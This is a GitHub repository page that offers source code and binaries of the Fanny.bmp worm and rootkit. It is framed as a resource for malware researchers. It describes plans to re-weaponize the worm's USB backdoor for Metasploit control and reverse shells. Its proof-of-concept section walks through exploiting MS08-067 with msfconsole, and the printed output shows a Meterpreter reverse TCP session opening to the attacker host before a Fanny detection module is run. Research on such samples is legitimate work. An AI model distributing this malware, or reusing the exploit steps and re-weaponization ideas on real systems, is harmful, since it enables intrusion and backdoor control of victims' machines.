Skip to content

FANNY BMP MALWARE SOURCE + BINARY + Metasploit Module Checker

Notifications You must be signed in to change notification settings

launchcodeis127/fanny.bmp

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

FannyBMP or DementiaWheel


MAJOR update coming soon:

I will (when I am done with the OSCP I am currently enrolling in) Soon create & upload the following:

  • Recording (From scratch(0%), to 100%) of when Fanny.bmp infects a PLC (although.. It does not do anything, or even "infects a PLC" but, it detects PLC's in a kinda-similar way StuXNet did.) (although a virtual one, since I have not real access to a nuclear reactor.. For.. well, quite - obvious reasons.
  • Recording (again, From 0 to 100%) of how one can "re-weaponize" Fanny.bmp (or,DementiaWheel as it's codename suggests) the USB-Backdoor to carry commands from & to Metasploit. (This is tested and, let's just say - it works, but needs improvement. (Massive improvements that is)) <- Still working on it.
  • A mini-library written in C (in combination with Lua) to make (the 2 points above ) a bit more user-friendly
  • (JUST so you don't need to be a debugger-professional to understand how to get a reverse shell trough fanny's USB Backdoor for example.)

For the story Refer to both the article(s) I've been provided below, but also - if you're interested; read my theory fanny.bmp's and StuXNet's purpose in the ISSUES page. "The Purpose of Fanny.bmp - in relation to StuXNet #7 "

Related samples: Agent.btz and Stuxnet

Refs:

[+1] video, demonstrating a Re-Creation of fanny.bmp to display a MessageBox(soon cmd)

Note, I have created a new POC video demonstrating fanny.bmp, as well as a bug

(that I do not think is known? At least probably not to the developers that made fanny.bmp, although this is probably quite expected, that it would hide files using the prefix the rootkit is designed to just "hide").

But the unexpected thing was "to me anyway" that, it crashed explorer (and, the whole XP) while doing this.) This is done by "using" the rootkit provided in fanny.bmp.

How to re-create the Crash/bug:

If you name a folder/file/shortcut " _ _ e _ _ . l n k " (Note: Explorer will make the file not-displayed when you type e) and then, hopefully - it will crash with an error message. Or 2 error messages by the way.

POC (Proof Of Concept) Video(s)


The renewed video is here:

https://youtu.be/Uto_lcD2f38

###As well as the video file itself, here: https://github.com/loneicewolf/fanny.bmp/blob/main/ReNewed(Fannybmp%20Winxp%20Poc)%20(With%20Rootkit%20Demo%20%2B%20Bug%20Crash)%20.mp4.7z


The screenshot of the "empty" (not infected by fanny) USB (that, was "experimented" with and later, as well infected by fanny.bmp) Displaying the files that the rootkit tried to hide, but it crashed explorer.exe with 2 error messages instead.

https://github.com/loneicewolf/fanny.bmp/blob/main/SanUltra%20(Fanny.bmp%20Bug).png

2 Error messages from fanny.bmp while it's rootkit was in use (and tried to hide a file/directory created by the user, called "e.lnk" in this example)

https://github.com/loneicewolf/fanny.bmp/blob/main/2Errors(while%20rootkit%20tried%20to%20hide%20__).png

For detection of fanny.bmp infections using MetaSploit,

Documentation for

the moudle avail. here: at the wiki https://github.com/loneicewolf/fanny.bmp/wiki/Docs


POCS

By-OS:


All these I thought of earlier providing, since I was one of the people that got this on my USB stick (my USB got infected long long time ago, Years ago now.) - But now - when I looked closer and I saw that some of these isn't even available online (Some of them are, still - like fanny.bmp and maybe some others, and ECELP4.acm) but not any of mscorwin / comhost, etc. (If they are - I would love to hear that! and the source of it. The more sources of same malware - the better. It strengthens the "community" if I can put it that way. And it is easier to find if all material is gathered at one place. But I thought of providing all of these to malware researchers. As well as for academical purposes.


Note: In the video I provided, I had slight problems with the USB Keyboard. So I wrote "EDUCATIONAK" but meant "EDUCATIONAL". Contact me for any details.

(Q) Why would you want to upload malware? You're literally providing CyberWeapons! (A) I believe in Open-Source, and that even though in this scenario, can hopefully help malware researchers provide better protection.

But the major point, is actually - as said above, but adding the following reason:

  • to help the feature find these malware and samples. As I think there are very little (if not none) of these easily accessible online. (Samples that is)

To Detect fanny, refer to this article:

And (for "optional" reading) I would suggest this one: "AiR-ViBeR: Exfiltrating Data from Air-GappedComputers via Covert Surface ViBrAtIoNs." - writeup about Stuxnet,Fanny, Agent.btz (which is really like each others in ways)

POC:

First, Git clone the fanny_bmp_check.rb from Metasploit! (Now - always go to metasploit (oficially) to get the fanny.bmp module. To always get the latest version of it. In which I believe is vital when we talk security)

place it into your msf folder, (important, check the following step before placing it) usually located in /root/.msf4/modules/

  • make the following folders: (under each other) /post/windows/gather/forensics/ <fanny_bmp_check.rb here>

Start msfconsole

use exploit/windows/smb/ms08_067_netapi

set RHOST and LHOST.

msf6 exploit(windows/smb/ms08_067_netapi) > run

  [*] Started reverse TCP handler on 192.168.122.1:4444 
  [*] 192.168.122.160:445 - Automatically detecting the target...
  [*] 192.168.122.160:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
  [*] 192.168.122.160:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
  [*] 192.168.122.160:445 - Attempting to trigger the vulnerability...
  [*] Sending stage (175174 bytes) to 192.168.122.160
  [*] Meterpreter session 4 opened (192.168.122.1:4444 -> 192.168.122.160:1043) at 2020-12-22 16:55:02 +0100

meterpreter > run post/windows/gather/forensics/fanny_bmp_check

[*] Searching registry on WORKSTATION1 for Fanny.bmp artifacts.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\Driver found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter2 found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter3 found in registry.
[+] WORKSTATION1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\acm\ECELP4\filter8 found in registry.
[*] WORKSTATION1: 4 result(s) found in registry.

Fanny (and the other files, completely provided)

includes:

If you spot an mistake, please let me now.


Urgent Contacts: (Malware Researchers) Discord: Ken-Kaneki#3978 Mail: william-martens@protonmail.ch

About

FANNY BMP MALWARE SOURCE + BINARY + Metasploit Module Checker

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C 96.8%
  • Ruby 3.2%